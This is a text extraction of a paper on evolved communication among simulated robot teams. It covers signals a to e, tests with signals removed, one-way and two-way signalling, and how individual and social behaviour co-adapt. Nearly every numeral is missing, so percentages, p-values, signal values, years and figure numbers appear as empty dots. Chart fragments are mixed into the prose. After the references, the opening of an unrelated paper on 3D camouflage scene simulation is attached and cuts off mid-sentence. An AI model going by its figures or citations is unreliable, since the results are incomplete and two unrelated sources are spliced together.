neural architecture influences the obtained performance we tested the evolved teams of reactive and non-reactive experiments in three conditions: a normal condition, a deprived condition in which robots were not allowed to detect other robots’ signals (i.e. in which communication sensors were always set to a null value), and in a no-signal conditions in which the two sets of evolutionary experiments were replicated by not allowing robots to detect other robots’ signals and in which evolved robots were tested in the same deprived condition (see figure ). . . . . . normal deprived no-signals figure . average fitness of all teams of the last generations of different replications of the experiments. grey and black histograms represent the average fitness of reactive and non-reactive robots, respectively. normal histograms represent the fitness obtained by testing the robot in a normal condition (in the same condition in which they have been evolved). deprived histograms represent the fitness obtained by testing robots (evolved in a normal condition) in a control condition in which they are not allowed to detect other robots’ signals. no- signals histograms represent the fitness obtained by evolving and testing robots in a control condition in which they are not allowed to detect other robots’ signals. fitness value are normalized in the range [ . - . ], were . corresponds to the case in which individuals spend the entire lifetime in target areas equally divided into two groups (i.e. a fitness value that cannot be reached in practice since robots first have to locate and reach the two target areas). in all cases, individuals have been tested for trials. performance in the “normal” condition is better than in the other two conditions. the difference is statistically significant (p < . ) both in the case of reactive and non-reactive robots. the fact that performance in the “normal” condition are better demonstrate that robots use their ability to produce and detect signals. the fact that non-reactive outperform reactive robots in the normal condition (differences in performance are statistically significant) indicates that the possibility to integrate sensory- motor information through time is exploited by non-reactive individuals. moreover, the fact that the differences of performance between reactive and non-reactive conditions are not statistically significant in the “deprived” and “no-signal” conditions indicates that the possibility to integrate sensory-motor information through time is exploited by communicating individuals only. we will analyse the differences between robots’ individual and social behaviour and the relation between these two forms of behaviours in more detail in section . . the evolved communication system: signals produced and their effects of other robots behaviour by analysing the teams of the best replication of the experiment we observed that evolved individuals developed a non-trivial communication system, both in the case of the reactive and non-reactive experiments. more specifically evolving robots display an ability to develop a sort of lexicon (including - different signals), a perceptually grounded categorization of the physical and social world reflected by the different signals, an ability to appropriately modulate their motor behaviour on the basis of the signals detected, an ability to appropriately modulate their signalling behaviour on the basis of the signals detected. in the next two sections we will describe in details the signals produced by reactive and non-reactive robots in different conditions and the effect of the detected signals on robots’ motor and signalling behaviours. as we will see, in the case of the best replication, reactive and non-reactive robots developed a similar signalling system. however, non-reactive robots outperform reactive robots in their ability to “use” the signals detected. in section we will describe the evolved communication modalities. finally, in section , we will describe robots’ individual behaviour and the relation between individual and social/communicative behaviours. . experiment i – reactive robots reactive robots of the best replication (the same described in figure , left) produce at least four different types of signals: (a) a signal a with an value of about . produced by robots located outside the target areas not interacting with other robots located inside target areas; (b) a signal b with an value of about . produced by robots located alone inside a target area; (c) a signal c, an highly varying signal with an average value of . , produced by robots located inside a target area that also contains another robot; (d) a signal d with an value of about . produced by robots that are approaching a target area and are interacting with another robot located inside the target area. robots receiving these four types of signals modify their motor and/or signalling behaviour on the basis of the signal received and on other available sensory information. more specifically: ( ) robots located outside the target areas receiving signal a tend to modify their motor behaviour in a way that allow them to explore the environment more effectively, i.e. to find more quickly the target areas (see below); ( ) robots located outside target areas receiving signal b tend to modify their motor behaviour (by approaching the robot emitting the signal and the corresponding target area) and their signalling behaviour (i.e. by producing signal d instead of signal a); ( ) robots located outside the target areas receiving the signal c (i.e. the signal produced by two robots located inside a target area) modify their motor behaviour so as to move away from the signal source. ( ) robots located inside the target areas that receive the signal c (i.e. the signal produced by two other robots located inside the target area) tend to modify their motor behaviour so as to exit from the target area. to verify the functionality of signal a, we measured the time elapsed until at least one robot of the team reaches one of the two target areas in a normal condition and in a control condition in which robots were not allowed to detect signals (i.e. in which the state of the four communication sensors of all robots was always set to a null value). by testing the best evolved team of robots in the two conditions, we observed that the time needed to reach the first target area, on the average, is . s and . s in the case of the normal and the control condition, respectively (grey bars in figure ). this implies that signals a, produced by robots located outside target areas allow the team to better explore the environment and, consequently, to more quickly reach the target areas. normal deprived figure . the average time elapsed (seconds) until at least one robot of the team reaches one of the two target areas in a normal condition (“normal”) and in a control condition (“deprived”) in which robots were not allowed to detect signals during the test. black and grey bars represent the average time required by non-reactive and reactive robots, respectively. average performance obtained by testing the robots for trials lasting seconds. to verify the functionality of signal b, we tested a team consisting of two robots placed in an environment including only a single target area (one of the robots was manually placed into the target area, while the other one was placed in a random position outside the area) in a normal condition and in a control condition in which robots were not allowed to detect signals (i.e. in which the state of the four communication sensors of all robots was always set to a null value). testing the best evolved team of robots in the two conditions, we observed that the percentage of trials in which the robot placed outside was able to reach the target area within seconds is . % and . % in the normal and control condition, respectively (grey bars in figure ). this demonstrates that robots detecting signal b modify their motor behaviour so to approach the source of the signal. we will discuss the effect of signal b on robots signalling behaviour in the next section. normal deprived figure . percentage of trials in which both robots were able to reach the target area. tests of a team consisting of two robots placed in an environment including only a single target area in a normal condition (“normal”) and in a control condition (“deprived”) in which robots were not allowed to detect signals. grey and black bars represent the performance of reactive and non-reactive robots, respectively. average performance obtained by testing the robots for trials lasting seconds. robots located inside a target area produce signal b. however, two interacting robots located in the same target area reciprocally modulate their signalling behaviour so as to produce signal c (i.e. a highly varying signal with an average value of . ). indeed, by placing two robots in a target area and by preventing the former to detect the signal produced by the latter, we observed that the first robot produces the signal b. to verify whether signal c reduces the chances that more than two robots enter in the same target area, we tested a team consisting of three robots in an environment including only a single target area in a normal condition and in a “deprived” control condition in which communication was disabled (i.e. in which the state of the four communication sensors of all robots was always set to a null value). at the beginning of each trial two robots are placed inside the target area and one robot is placed outside the target area with randomly selected positions and orientations. testing the best evolved team of robots in the two conditions we observed that the percentage of trials in which the robot initially placed outside the target area erroneously enters the area is . % and . %, in the normal and control condition, respectively (see grey bars in figure ). to verify whether signal c increases the chances that a robot exits from a target area that contains more than two robots we tested a team of three robots in an environment including only a single target area in a normal condition and in a “deprived” control condition in which communication was disabled. at the beginning of each trial, all three robots were placed inside the target area with randomly selected positions and orientations. the percentage of times in which one of the three robots exit from the target area is . % and . % in normal and deprived conditions, respectively (see figure , grey bars). normal deprived figure . percentage of trials in which a third robot erroneously enters in a target area that already contains two robots in a normal condition (“normal”) and in a control condition (“deprived”) in which robots were not allowed to detect signals. grey and black bars represent the performance of reactive and non-reactive robots, respectively. average performance obtained by testing the robots for trials lasting seconds. normal deprived figure . percentage of times in which one robot exit from a target area that contains three robots in a normal condition (“normal”) and in a control condition (“deprived”) in which robots were not allowed to detect signals. grey and black bars represent the performance of reactive and non-reactive robots, respectively. average performance obtained by testing the robots for trials lasting seconds. . experiment ii – non-reactive robots non-reactive robots of the best replication (the same described in figure , right) produce at least five different types of signals. the signals a, b, c and d are analogous to the corresponding signals produced by reactive robots (i.e. although the value of the signals varies, they are produced in the same circumstances and have functionally similar effects). more precisely, non-reactive robots produce the following signals: (a) a signal a with an value of about . produced by robots located outside the target areas that do not detect other robots’ signals; (b) a signal b with an value of about . produced by robots located alone inside a target area; (c) a signal c, an highly varying signal with an average value of . , produced by robots located inside a target area that also contains another robot; (d) a signal d with an value of about . produced by robots outside target areas that are approaching a target area and are interacting with another robot located inside the target area. (e) a signal e, an highly varying with an average value of . , produced by robots located outside the target areas interacting with other robots also located outside target areas. robots receiving these five types of signals modify their motor and/or signalling behaviour on the basis of the signal received and of other available sensory information. more specifically: ( ) robots located outside the target areas receiving signal a modify their signalling behaviour by producing signal e; ( ) robots located outside target areas receiving signal b tend to modify their motor behaviour (by approaching the robot emitting the signal and the corresponding target area) and their signalling behaviour by producing signal d; ( ) robots located outside the target areas receiving the signal c (i.e. the signal produced by two robots located inside the target area) modify their motor behaviour so as to move away from the signal source; ( ) robots located inside target areas receiving the signal c (i.e. the signal produced by two robots located inside the target area) modify their motor behaviour so as to exit from the target area. ( ) robots located outside the target areas receiving signal e tend to modify their motor behaviour to better explore the environment. the fact that signals a and e produced by robots located outside target areas allow them to explore the environment more effectively (i.e. to more quickly find target areas) is demonstrated by the fact that the average time in which the first robot enter in one of the two target areas is . s and . s in normal and deprived conditions, respectively (see the black bars in figure ). by testing the best teams of the other replications of the experiment similar results were observed in most of the cases (result not shown). overall, these results indicate that robots exploit their signalling behaviour to produce a form of coordinated exploration that increases their ability to quickly find the target areas. to identify the relative roles of the two signals we ran an additional test in which robots were allowed to produce and detect signal a but were not allowed to switch from signal a to e (they were forced to produce signal a even when they start to detect the signal a produced by other robots). the obtained result (i.e. an average time of . s) indicates that the functionality is provided by the signal e, while the role of signal a is that to trigger the production of signal e. the fact that signal b increases the chances that other robots enter the target area from which the signal is produced is demonstrated by the fact that the percentage of trials in which a robot placed outside the target area enters in a target area that already contains a single robot is . % and . % in the case of robot tested in normal and deprived conditions, respectively (see the black bars in figure ). the fact that signal c reduces the chances that other robots enter into a target area that already contains two robots is demonstrated by the fact that the percentage of times in which a third robot joins a target area that already contains two other robots is . % and . % in normal and deprived conditions, respectively (see figure , black bars). the fact that signal c increases the chances that a robot exits from target area that contains more than two robots is demonstrated by the fact that the percentage of times in which one of three robots located in the same target area exit the area is . % and . % in normal and deprived conditions, respectively (see figure , black bars). the functionality of signal d (both in the case of non-reactive and reactive robots) and more generally the functionality of the effects that signals detected have on the type of signals produced will be discussed in the next section. . the evolved communication system: communication modalities evolving robots might rely on mono or bi-directional communication forms. in mono- directional communication forms, the motor behaviour or the signal produced by one individual affects the behaviour of a second individual but the behaviour of the latter individual does not alter the behaviour of the former individual. in these forms of communication, the two robots play the role of the ‘speaker’ and of the ‘hearer’, respectively, and communication can be described as a form of information exchange (in which communication allows the ‘hearer’ to access information that is available to the ‘speaker’) or as a form of manipulation (in which the ‘speaker’ alters the behaviour of the ‘hearer’ in a way that is useful to the ‘speaker’ or to both the ‘speaker’ and the ‘hearer’). in bi-directional communication forms, on the other hand, the motor or signalling behaviour of one individual affects the second individual and vice versa. in these forms of communication each robot plays both the role of the ‘speaker’ and of the ‘hearer’ (i.e. different roles cannot be identified). another important aspect that characterizes communication forms is whether they consist of static or dynamical processes. in static communication forms, the signal produced by an individual is only a function of the current state of the individual. in dynamic communication forms, instead, the signal produced at a given time step is also a function of the signals produced and detected previously. as an example of a static communication form we might consider the case of a robot emitting an alarm signal continuously (until the danger disappears). as an example of a dynamic communication form we might consider the case of two individuals that alternatively play the role of the speaker and of the hearer by taking turns (iizuka and ikegami, a, b). bi-directional and dynamical communication forms might lead to emergent properties (e.g. synchronization or shared attention) that result from the mutual interaction between two or more individuals and that cannot be explained by the sum of the individual contributions only (di paolo, ). in the experiments reported in this paper the modalities that regulate communicative behaviours are not predefined but vary within evolving individuals. indeed, as we will see, evolved agents use different communication modalities in different circumstances. to describe the communication modalities used, let us consider a simplified situation in which a team consisting of two robots is placed in an arena that includes only a single target area. figure (left) and figure show the typical motor and signalling behaviour exhibited by two reactive robots. initially the two robots are both outside the target area and produce a signal with an value of about . (signal a). when the two robots get close enough and detect the other robot’s signal, they slightly change their motor trajectory so as to increase their chances to end up in a target area. individual # reaches the target area and starts to produce a signal with an value of about . (signal b). once robot # gets close enough to robot # (i.e. as soon as it starts to detect the signal b produced by robot # ) it modifies its trajectory so as to approach the direction of the signal and it starts to produce signal d (i.e. a signal with almost null value). later on, when robot # enters the area, the two robots start to produce an highly varying signal with an value of about . (signal c). signal c affects the motor behaviour of robots located outside the target area (which tend to avoid the target area) and inside the target area (which tend to exit from areas that contains more than two robots). signal c also affects the signalling behaviour of other robots located inside a target area. indeed, robots located inside a target area switch their signalling behaviour from b to c when they detect the signal produced by another robot located in the same target area. figure . the behaviour of two robots tested in an arena including a single target area. the dashed and full lines represent the trajectory of robot # and # , respectively. the numbers indicate both the starting and ending positions of the corresponding robots. left: typical behaviour exhibited by a reactive robot. right: typical behaviour exhibited by a non-reactive robot. . . . . . . . . . lifecycles si gn al in te n si ty & out in, out & in a b c d figure . values of the signals produced by the two reactive robots during the behaviour shown in the left side of figure . dashed and full lines indicate the values of the signals produced by robot # and # , respectively. letters (a,b,c, and d) indicate the classes of signals produced by the robots. the black lines at the bottom of the figure indicate the three phases in which: ( ) both robots are outside the target area, ( ) robot # is in and robot # is out, and ( ) both robots are inside the target area. the grey lines at the bottom of the figure indicate the phases in which the two robots are located within the signal range. the short signals produced when the robots outside target areas are produced when they detect an obstacle through their infrared sensors. these signals do not seem to play any functional role. as shown in figure (right) and figure , non-reactive robots rely on similar communication modalities. initially the two robots are both outside the target area and produce a signal with an value of about . (signal a). as soon as the two robots get close enough to detect their signals, they produce a signal with a varying value and an average value of . (signal e) and they vary their motor trajectory by increasing their turning angle so to increase their chance to enter into a target area. after some time robot # reaches the target area and starts to produce a signal with an value of about . (signal b). later on, once robot # returns close enough to robot # and detects the signal b produced by robot # , it modifies its motor trajectory (by approaching robot # ) and its signalling behaviour (by producing signal d, i.e. a signal with an almost null value, instead of signal a). when also robot # enters the area, the two robots start to produce a varying signal with an average value of about . (signal c). this signal reduces the probability that other robots will enter in the area and eventually, if an additional robot erroneously joins the area, increases the probability that a one of the robots exits from the area. . . . . . . . . . lifecycles si gn al in te n si ty & out in, out & in a b c d e figure . values of the signals produced by the two robots provided with hidden units during the behaviour shown in the right side of figure . dashed and full lines indicate the values of the signals produced by robot # and # , respectively. letters (a, b, c, d and e) indicate the classes of signals produced by the robots. the black lines in the bottom part of the figure indicate the three phases in which: ( ) both robots are out the target area, ( ) robot n. is in and robot n. is out, and ( ) both robots are inside the target area. the grey line in the bottom part of the figure indicate the phases in which the two robots are located within the signal range. the short signals produced when the robots outside target areas are produced when they detect an obstacle through their infrared sensors. these signals do not seem to play any functional role. by analysing the functionality of the different signals and the context in which they are used, we can see how evolved robots use different communication modalities and select on the fly the modality that is appropriate for the current situation. the situation in which one robot is located inside a target area and another robot is located outside, within the communication range, is a case in which the former robot has access to information (related to the location of the target area) to which the latter robot does not have access to. in this particular case, communication should be mono-directional since the latter robot should change its behaviour on the basis of the signal produced by the former robot while the former robot should not necessarily change its motor or signalling behaviour as a result of the signal produced by the latter robot. indeed in this situation the evolved robots rely on a mono-directional communication form in which the former robot produces the signal b and the latter robot switches its signalling behaviour off by producing the signal d (i.e. a signal with an almost null value). this communication interaction thus can be described as an information exchange behaviour in which the former robot (the speaker) produces a signal that encodes information related to the location of the target area and the latter robot (the hearer) exploits this information to navigate toward the area. or, alternatively, this communication interaction can be described as a form of manipulation in which the former robot (the speaker) manipulates the motor behaviour of the latter robot (the hearer) so as to drive the robot toward the target area. the ability of robots located outside target areas to switch their signalling behaviour off (i.e. to produce the signal d) as soon as they detect the signal b plays an important function both in the case of reactive and non-reactive robots. indeed, by testing a team of two robots in an environment including a single target area, in a normal condition and in a control condition in which robots were prevented from the ability to switch between signal a and d, we observed that performance in the control condition are much worse. more precisely, the percentage of trials in which both robots were able to reach the target area within seconds drop from . % to . % (in the case of reactive robots) and from . % and . % (in the case of non-reactive robots) in the normal and control conditions, respectively (figure ). normal no modulation figure . percentage of trials in which a team of two robots randomly placed in an environment with only one target area are able to both enter in the target area. tests performed in a normal conditions and in a control condition in which robots outside target area were not allowed to switch their signalling behaviour from a to d. grey and black bars represent the performance of reactive and non-reactive robots, respectively. average performance obtained by testing the robots for trials lasting seconds. on the contrary, when two robots are located in the same target area, none of the two robots have access to the relevant information (i.e. the fact that the target area contains two robots). this information, however, can be generated by the interaction between the two robots through a bi-directional communication modality. this is indeed the communication modality that is selected by evolved robots in this circumstance. the signal produced by one of the two robot affects the signal produced by the second robot, and vice versa. this bi-directional interaction allow the two robots to switch from signal b (i.e. a signal that increases the chances that other robots will joint the area) to signal c (i.e. a signal that decreases the chances that other robots will joint the area). interestingly in this circumstance, evolved robots also rely on a dynamical communication modality, i.e. they produce signals that vary in time as a result of signals previously produced and detected by the two robots. more precisely, in the case of non- reactive robots, the signal c tend to vary in time as a result of the following factors: ( ) the value of the signal detected inhibits the signal produced, ( ) the intensity of the inhibition also depends on the direction of the detected signal, ( ) the signal tends to be detected by always varying relative directions since robots located inside target area turn on the spot. the production of an oscillatory signal with an average value of . (in the case of non- reactive robots) in this situation, rather then a stable non-dynamical signal, plays an important functional role. indeed, we observed that evolved robots rely on oscillatory signals in all the replications of the experiment (both in the case of reactive and non-reactive robots). moreover we observed that stable signals do not allow to reach the same level of performance. to ascertain whether the production of a stable signal could lead to the same functionality of this oscillatory signal we performed a test in which non-reactive robots were forced to emit a stable signal when located in a target area that contained two robots. robots were allowed to behave normally in all other cases. the test was repeated times by using stable signals with different values ranging from . to . . the fact that, as shown in figure , obtained performance is always lower than performance obtained by allowing the robots to produce the oscillatory signal confirms that the dynamical nature of the signal is functional. . . . . . . . . . . . . . figure . the continuous line represents the fitness values obtained by a team of non-reactive robots tested in a control condition in which robots are forced to emit a stable signal when they are located in a target area that contains two or more robots. the vertical and horizontal axis represent the fitness and the value of the signal, respectively. the dashed line represents a benchmark showing the value of the fitness reached by a team tested in normal condition. for each condition robots are tested for trials. one reason that might explain the necessity to rely on an oscillatory signal in this circumstance is the fact that the signal c has at least three different functions: it informs other robot located in the target area of the presence of the signalling robot, it reduces the probability that other robots enter the target area, and it increases the probability that, when the target area contains more than two robots, one of the robot will exit the area. indeed by analysing the behaviour of the robots in the test in which robots were forced to produce signals with a fixed value we observed that: (a) when the value of the signal is below . , robots tend to erroneously exit from the target area also when the area includes only two robots, and (b) when the value of the signal is . or above, both the ability to reduces the chances that other robots joint the target area and the ability to increase the chances that robots exit from the target area (when the area contains more that two robots) are severely impaired. another possible reason that might explain the necessity to produce an oscillatory signal is the fact that the signal c must produce the same effect (i.e. reduce the chances that other robots enter in the target area) both when the signal is produced by two or three interacting robots located into the same target area, and two different effects (i.e. increase the chances that one robot exit from the target area or not) when the signal is produced by three or two robots located in the same target area, respectively. the frequency of oscillation of signal c varies when the signal is produced by two or three robots located in the same target area. indeed, by analysing the signals produced in these two circumstances by a fourier transform, we observed that the frequency and the spectrograms are different in the two cases (see figure ). these two signals, c and c , emitted by a robot located in an area with another or two other robots respectively, have different functions since signal c increases the chances that one of the robot exits from the target area while signal c does not. figure . the two spectrograms (obtained by the fourier transform) of the signal c emitted by a robot. the left and right pictures correspond to the signal produced by a robot located in a target area that contains another or another two robots, respectively. the sampling frequency is hz, since each communication output is emitted by a robot each . seconds. therefore, the frequency components range is [ , ] hz. . relation between individual and social/communicative behaviour since the robots individual and social behaviour co-evolve we might wonder which the relation between these two forms of behaviour is and how the possibility to co-adapt these forms of behaviour is exploited in evolved individuals. the fact that the performance of robots that are tested in the “deprived” control condition is similar to that of robots evolved and tested in a “no-signal” control condition (see figure ) indicates that evolved robots develop an effective individual behaviour (i.e. a behaviour that maximizes the performance that can be achieved without signalling) even if they have always been evaluated in a normal condition (in which signals are available). the adaptive pressure toward the development of an effective individual behaviour can be explained by considering that the social enhancement that can be achieved by exploiting the signal produced by the other robots is not always guaranteed. indeed, the availability of the signals required is due to the presence of other robots in the right environmental locations that, in turn, is influenced by unpredictable variable such us the initial positions and orientations of the robots. by analysing the behaviour displayed by evolved robots tested in the “deprived” control condition (figures ), we can see that both reactive and non-reactive robots are able to spend about % of their lifetime in the three most favourable conditions (in which the team gathers a fitness of . , . , or . ) and less than % of their lifetime in the two least favourable conditions (in which the team gathers a fitness of - . or - . ). these performances are achieved through a simple behaviour (see figure ) that includes the following elementary behaviours: (a) when robots approach walls or other robots they avoid the obstacles by turning approximately o; (b) when the robots are far from walls and are not located in target areas they move by producing a curvilinear trajectory; (c) when the robots are located in a target area, they remain in the area by turning on the spot. reactive and non-reactive robots mainly differ with respect to the curvilinear trajectories produced far from walls, which lead to smaller and larger semi-circles in the case of reactive and non-reactive robots, respectively. these larger semi-circular trajectories allow non- reactive robots to find the target areas much more quickly with respect to non-reactive robots. indeed, the percentage of lifecycle in which all the four robots are located in the target areas is about % and %, on average, in the case of reactive and non-reactive robots (see figure ). the fact that non-reactive robots are better in finding the target areas, however, does not translate into better performance (in the “deprived” condition) since non-reactive robots are more likely to spend their lifetime both in positive conditions (in which each target area contains one or two robots) and negative conditions (in which a target area contains three or four robots). as a consequence, although non-reactive robots display a better exploration strategy than reactive robots, overall performance of reactive and non-reactive robots is similar in “deprived” conditions. figure . typical behaviour displayed by the team of evolved robots in a “deprived” condition in which they are not allowed to detect other robots’ signals for reactive (left) and non-reactive robots (right). the numbers indicate the starting and ending position of the corresponding robot (the ending position is also marked with a white circle). . . . . . . void + + + figure . percentage of lifecycles spent by a team of four robots in the possible different states tested in a “deprived” condition in which robots are not allowed to detect other robots’ signals. “void” indicates the case in which all the four robots are located outside target areas (fitness = . ). “ ” indicates the case in which only a single robot is located in a target area (fitness = . ). “ ” indicates the case in which two robots are located in target areas. “ + ” indicates the case in which one robot is located in a target area an other two robots are located in the other target area (fitness = . ). “ + ” indicates the case in which each of the two target area contains two robots (fitness = . ). “ + ” the case in which one target area contains one robot and the other three robots (fitness = . ). “ ” indicates the case in which three robots are located in the same target area (fitness = - . ). “ ” indicates the case in which four robots are located in the same target area (fitness = - . ). grey and black bars represent the performance of reactive and non-reactive robots, respectively. average performance obtained by testing the robots for trials lasting cycles. when we look at the relation between individual and social behaviour, however, we can see that the characteristics of the individual behaviour exhibited by reactive and non-reactive robots perfectly match with the characteristics of their social/communicative behaviour. in other words, individual and social behaviour are tightly co-adapted. the fact that reactive robots display a ‘sub-optimal’ exploration behaviour (i.e. a behaviour that does not maximize the probability to quickly find and enter into target areas) can be explained by considering their limited ability to avoid target areas that already contain two robots and to exit from target areas that contain more than two robots (see figure and ). a reliable ability to avoid situations in which more than two robots are located into the same target area thus constitute a pre-requisite for the emergence of a better exploration ability. the lack of this pre-requisite in reactive individuals explains why their exploration ability is not further optimised. on the other hand, the better capability of non-reactive robots to avoid situations in which more than two robots are located in the same target area (see figure and ), explains why evolved non-reactive robots developed a more effective exploration behaviour. indeed, if we look at the time spent by robots in target areas that contain more than two robots, we can see that in a “deprived” condition, non-reactive robots are much worse than reactive robots (figure ). in normal conditions, instead, non-reactive robots are much better than reactive robots (figure ). . . . . . . . . void + + + figure . percentage of lifecycles spent by a team of four robots in the possible different states (see the legend of figure ) tested in a normal condition. grey and black bars represent the performance of reactive and non-reactive robots, respectively. average performance obtained by testing the robots for trials lasting cycles. . discussion in this paper we have described the results of an experiment in which an effective communication system arises among a collection of initially non-communicating agents evolved for the ability to solve a collective navigation problem. by analysing the obtained results we observed how evolving individuals developed: (a) an effective communication system, (b) an effective individual behaviour, (c) an ability to rely on different communication modalities and to autonomously select the modality that is appropriate to the current circumstances. the communication system that emerges in the experiments is based on - different signals that characterize crucial features of the environment, of the agents/agents relations, and agents/environmental relations (e.g. the relative location of a target area, the number of agents contained in a target area, etc.). these features, that have been discovered autonomously by the agents themselves, are grounded in agents’ sensory-motor experiences. used signals, therefore, do not only refer to the characteristics of the physical environment but also to those of the social environment constituted by the other agents and by their current state. evolved individuals also display an ability to appropriately tune their individual and communicative behaviour on the basis of the signals detected (e.g. by approaching, avoiding, or exiting a target area, by modifying their exploratory behaviour, etc.) . indeed, the type of signals produced, the context in which they are produced, and the effect of signals detected constitute three interdependent aspects of the communication system that co-adapt during the evolutionary process and co-determine the ‘meaning’ and the efficacy of each signal and of the communication system as a whole. the individual behaviour of evolved robots includes simple elementary behaviours that allow robots to avoid obstacles, explore the environment, and remain in target areas. interestingly, robots individual behaviour tend to be optimised (with respect to the possibility to obtain the best possible performance when signals produced by other robots are not available) despite the fact that robots are always evaluated in social conditions during the evolutionary process. this unexpected result might be explained by considering that required signals might not always be available (even in normal conditions in which robots are allowed to communicate) since their availability depends on the physical location of the robots in the environment that in turn depends on unpredictable events such us robots initial positions and orientations or noise). in other words, optimised individual behaviours guarantee good performance even when required signals are not available. this tendency to optimise both individual and social behaviour leads to the development of control systems structured hierarchically according to a layered organization in which the individual abilities represent the most basic layer and communication/social ability represents an higher level layer that modulates the lower level. the fact that communication abilities represent a high level structure that modulates the basic individual behaviours of the robots does not prevent evolving robots to co-adapt their individual and communicative behaviour. indeed, by comparing the results of different replication of the experiments, we observed that individual behaviours tend to be selected in order to maximize individual performance (when signals from other robots are not available) but also in order to maximize the performance that can be achieved by combining the robots individual and social capabilities. evolved robots also exploit different communication modalities (e.g. mono-directional communication forms in which one robot act as a ‘speaker’ and a second robot act as a ‘hearer’ or bi-directional communication forms in which two robots concurrently influence each other through their signalling and/or motor behaviour) by selecting the modality that is appropriate to each specific communicative interaction. evolving individuals also engage in complex communication behaviours that involve three different robots that concurrently affect each other so to produce appropriate collective behaviours (e.g. so to push one of the three robots located inside the same target area out of the area). evolved robots also exploit time varying signals that allow them to generate information that is not available to any single robot (e.g. information related to how many robots are located in a target area) and that serve different functions. the analysis of the evolutionary dynamics suggests that new individual capabilities might represent a crucial pre-requisite toward the development of new communication capabilities and vice versa. for example, the individual ability to explore the environment by entering and remaining into target areas represents a crucial pre-requisite for the development an ability to produce signal b, that attract other robots toward the target area. on the other hand, the emergence of a social/communicative ability to avoid target areas that contain two robots and to exit from areas that contain more than two robots, represents crucial pre-requisites for the development of better individual exploration strategies. in fact, as we showed in section , very effective exploration strategies provide an adaptive advantage only in combination with effective communication systems that allow to robots to avoid situations in which more than two robots are located in the same target area. this process in which progress in individual abilities might pose the basis for the achievement of progresses in communication abilities and vice versa might lead to an open ended evolutionary phases in which individuals tend to develop progressively more complex and effective strategies. acknowledgments the research has been supported by the ecagents project funded by the future and emerging technologies programme (ist-fet) of the european community under eu r&d contract ist- . references baldassarre g., nolfi s. & parisi d. ( ). evolving mobile robots able to display collective behaviour. artificial life, : - . cangelosi a. & parisi d. ( ) the emergence of a ‘language’ in an evolving population of neural networks. connection science, : - di paolo e.a. ( ). behavioural coordination, structural congruence and entrainment in a simulation of acoustically coupled agents. adaptive behaviour : . - . kirby s. ( ). natural language from artificial life. artificial life, ( ): -- . iizuka h. and ikegami t. ( a). adaptive coupling and intersubjectivity in simulated turn-taking behaviours. in banzahf et al. (eds.), proceedings of ecal , dortmund: springer verlag. iizuka h. and ikegami t. ( b). simulating turn-taking behaviors with coupled dynamical recognizers. in r.k. standish, m.a. bedau and h.a. abbass (eds.), mit, proceedings of artificial life viii, cambridge, ma: mit press. iizuka h. & ikegami t. ( ). simulating autonomous coupling in discrimination of light frequencies. connection science. ( ): - . marocco d., cangelosi a. & nolfi s. ( ), the emergence of communication in evolutionary robots. philosophical transactions of the royal society london - a, : - . nolfi s. ( ). evolving robots able to self-localize in the environment: the importance of viewing cognition as the result of processes occurring at different time scales. connection science ( ) : - . nolfi s. ( ). emergence of communication in embodied agents: co-adapting communicative and non-communicative behaviours. connection science. ( ) - : - . nolfi s. & marocco d. ( ). evolving robots able to integrate sensory-motor information over time, theory in biosciences, : - . quinn m. ( ). evolving cooperative homogeneous multi-robot teams. in proceedings of the ieee / rsj international conference on intelligent robots and systems (iros ). ieee press. quinn m. ( ). evolving communication without dedicated communication channels. in kelemen, j. and sosik, p. (eds.) advances in artificial life: sixth european conference on artificial life (ecal ). springer verlag. quinn m., smith l., mayley g. & husbands p. ( ). evolving controllers for a homogeneous system of physical robots: structured cooperation with minimal sensors. philosophical transactions of the royal society of london, series a: mathematical, physical and engineering sciences , pp. - . steels l. ( ). the talking heads experiment, antwerpen, laboratorium. limited pre- edition. steels l. ( ) evolving grounded communication for robots. trends in cognitive science. ( ): - . steels l. and kaplan f. ( ). aibo's first words: the social learning of language and meaning. evolution of communication, : - . steels l. & vogt p. ( ) grounding adaptive language games in robotic agents. in: p. husband & i. harvey (eds.), proceedings of the th european conference on artificial life. cambridge ma: mit press. werner, g.m. & dyer m.g. ( ). evolution of communication in artificial organisms. in langton, c. g., taylor, c., farmer, j. d., and rasmussen, s. (eds.) proceedings of the workshop on artificial life. pages: - . reading, ma, addison-wesley. wagner k., reggia j.a., uriagereka j., wilkinson g.s. ( ). progress in the simulation of emergent communication and language. adaptive behavior, ( ): - . introduction related literature experimental set-up and emergence of communication the evolved communication system: signals produced and their experiment i – reactive robots experiment ii – non-reactive robots the evolved communication system: communication modalities relation between individual and social/communicative behavio discussion international conference on sensor network and computer engineering (icsnce ) the research and implementation of d scene simulation of camouflage yu jun school of computer science and engineering xi'an technological university xi'an, , shanxi, china e-mail: yujun@xatu.edu.cn li zhonghua school of computer science and engineering xi'an technological university xi'an, , shanxi, china e-mail: @qq.com hu zhiyi engineering design institute army academy of pla beijing, , china e-mail: huzhiyi v @ .com dai jun school of computer science and engineering xi'an technological university xi'an, , shanxi, china e-mail: daijun @qq.com abstract—aiming at the problems in the camouflage design of military engineering, such as strong subjectivity and unpredictable camouflage effect, etc. we propose a d camouflage scene simulation method based on mfc and vega prime technologies. on the basis of real dem data in an area in american, we use d visualization technique to create terrain model and ground object model. the camouflage pattern is applied to the surface of the model by texture mapping technology, and real-time rendering is used. the engine vega prime api renders the model and creates a camouflage simulation scenario. the result shows that, the virtual scene of camouflage can be generated by using visual simulation technology, this helps to test the effect of the camouflage pattern. keywords-camouflage; terrain modeling; visual simulation; digital elevation model i. introduction camouflage, as the most basic military camouflage technology, is one of the commonly used method to combat investigation and attack in modern warfare[ ]. the commonly used method of engineering camouflage is to paint camouflage patterns on the surface of the target with dope, however, the effect of this kind of camouflage is influenced by environmental. this usually requires personnel to participate in the evaluation of camouflage effects, so it may consume a lot of resources. many scholars began to use the vega prime-based(vp) visual simulation technology to build d model of military target or reproduce a realistic environment to achieve realistic simulation results. for example, zhang[ ] combines the development features of mfc application program, gives a d visual development method based on multi-process technology, and applies it to the development of a d scene of a portable air defense missile simulator software. yao[ ] using the virtual battlefield large terrain visualization features and focuses on the research of large-scale real terrain visualization techniques.hu[ ] made a further improvement on zhang's foundation[ ], he gives a program framework that seamlessly integrates vp under vc++'s mfc library programming environment, optimizing the structure of the system. however, none of the above methods can perform real-time simulation of real d space and do not have interactive capabilities, making these methods unsuitable for simulation of engineering camouflage. in response to these problems, this paper is based on the d visual simulation method[ - ] and real dem data, combined with the actual engineering camouflage environment, establish the vega prime visual simulation framework based on mfc, design a real-time roaming system simulation of a camouflage scene. ii. the overall design of the simulation system the camouflage d scene simulation system includes two parts: simulation model 